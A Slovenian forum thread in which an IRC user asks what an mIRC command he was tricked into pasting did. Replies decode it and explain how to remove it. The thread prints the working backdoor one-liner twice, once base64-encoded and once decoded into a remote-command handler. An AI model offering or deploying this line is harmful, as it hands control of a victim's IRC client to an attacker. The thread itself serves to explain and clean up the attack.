» »

Mirc dodatek kaj naredi ta koda? In kakšna je zaščita

Mirc dodatek kaj naredi ta koda? In kakšna je zaščita

Dusko ::

Torej od enega kolega mislim vem kdo je to sem dobil sporočilo naj napišem to komando v irc.In potem mi je lahko oni tip spreminjal nick in me joinal na različne kanale brez moje vednosti. SAj zdaj sem seveda to datoteko že odstranil in je vse oki.Ampak me zanima če kdo zna to razvozlat ker vem da sem ustvaril datoteko potem se je odpakirala potem se ej zagnala in uporabniku napisala sporočilo hello
Mam pa zone alarm in čudno da je sploh prišlo do tega ,da je lahko nekdo dostopal do mene.
Možno pa tudi da zone alarm ni pravilno deloval ker ko sem ga odprl se ni nekaj lepo odprl sem imel prej neke težave s procesom explorer
No tukaj koda program ki ga pa tista oseba laufa pa je bitchx
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg BiGGy` Hello

torej ustvarlo je czm.mrc se naložlo in obvestilo uporabnika biggy da mu je napisal hello
Zanima me če obstaja kakšen poseben firewall za take zadeve ali ne oziroma ker nevem zakaj je sploh lahko oseba dostopa do mene.
Vem ,da je zaščita v tem ,da pač ne vnašam teh komand ampak vseeno je zanimivo,da je to delovalo.
Prav tako zone alarm ko sem pogledal malo loge nonstop mam da mi nekdo pošilja paketke
protocol je pa ICMP(type:8/subtype:0) vse skupaj pa je označeno z medium ali pa včasih tuji high prioriteto.
prosim za kakšno razlogo

kihc ::

Sicer tistega glede firewallov ne razumem preveč, vendar vseeno ti lahko povem moje mnenje;

-Tisto kar si ti naložil je pač tipičen addon, pač skupek kode, ki ga je pač shranjen v nekem fajlu, ki ga ti potegeneš z neta, inštalariraš pa z ukazom /load [mesto fajla + ime].

- Bistvo kode ni niti približno v tistem kar si ti napisal ampak se nahaja v alt+r (remote), če že imaš inštalirano kakšno skripto je tega na tone in med različnimi kosi skripte dospopaš v meniju view.

- Tisto za kar ti je on delav (spreminiv nick itd...) to je vse maslo tistega in ednini način je da ga pač zbrišeš :), ker nemoreš kar blokirat tega na firewallu, ker če blokiraš port potem crkne cel irc - tako vsaj jaz mislim.

DMouse ::

ZoneAlarm žal še ne zna ščititi pred lastno neumnostjo >:D (tudi drugi firewalli ne)

To kar ti je tip poslal, je mirc skripta, del te skripte je zakodiran. V celoti se glasi nekako takole:
//write czm.mrc on ^*:text:ins*:?:{ . $+ $2- | haltdef } | .load -rs czm.mrc | msg BiGGy` Hello

V datoteko czm.mrc napiše on ^*:text:ins*:?:{ . $+ $2- | haltdef }, nato pa jo naloada in obvesti Biggy-ja. Naloadana skripta se bo odzivala na privatna sporočila ki se bodo začenjala z besedico ins (preostanek sporočila je poljuben ukaz). V praksi lahko napadalec v tvojem imenu govori "jest sm peder" ali "pejte v rit" in podobne :D, lahko dobi op na vseh kanalih kjer si ti op... v končni fazi se lahko (če je dovolj poučen, v kar dvomim) polasti tvojega računalnika in ga uporablja kot proxy, dela nelegalne stvari, za katere greš potem TI v zapor...

Zgodovina sprememb…

  • spremenil: DMouse ()

OmegaBlue ::

Proti tistmu ni zaščite... no ubistvu je reče se ji pa "pamet".Napisalo ti je skripto, ubistvu jo uneslo v tvoj mirc, in preko remote komand ti je tipson lahko delau karkoli se mu zahoče in tega Firewall ne blokira..

Tisto kar ti je ZA sporočau je po vse verjetnosti ICMP ping..
Never attribute to malice that which can be adequately explained by stupidity.

DMouse ::

Ja tisti ICMP ping je pa po vsej verjetnosti od MSBlasterja in s tem, kar se ti je dogajal na ircu, nima veze.

Dusko ::

Torej rešitev je potem samo odstranitev te datoteke v mapi mirc ali se ta komanda se skopira kam drugam v mircu.
Mislim ker nebi rad mel še kakšnih drugih problemov.

Zgodovina sprememb…

  • spremenil: Dusko ()

OmegaBlue ::

napišeš /unload -rs czm.mrc in to je to :D
Never attribute to malice that which can be adequately explained by stupidity.


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

IRC - okoli mi pošilja tole: ipkinss.cyberion.pl

Oddelek: Omrežja in internet
161019 (854) Gandalfar
»

nov bug al neki podobnga v ircu?

Oddelek: Omrežja in internet
5892 (790) R0K
»

ZoneAlarm in Apache

Oddelek: Omrežja in internet
81286 (1191) govno
»

mIRC težava

Oddelek: Programiranje
111123 (865) Gandalfar
»

Kaj nardi ta skripta?

Oddelek: Programiranje
141076 (987) Monster

Več podobnih tem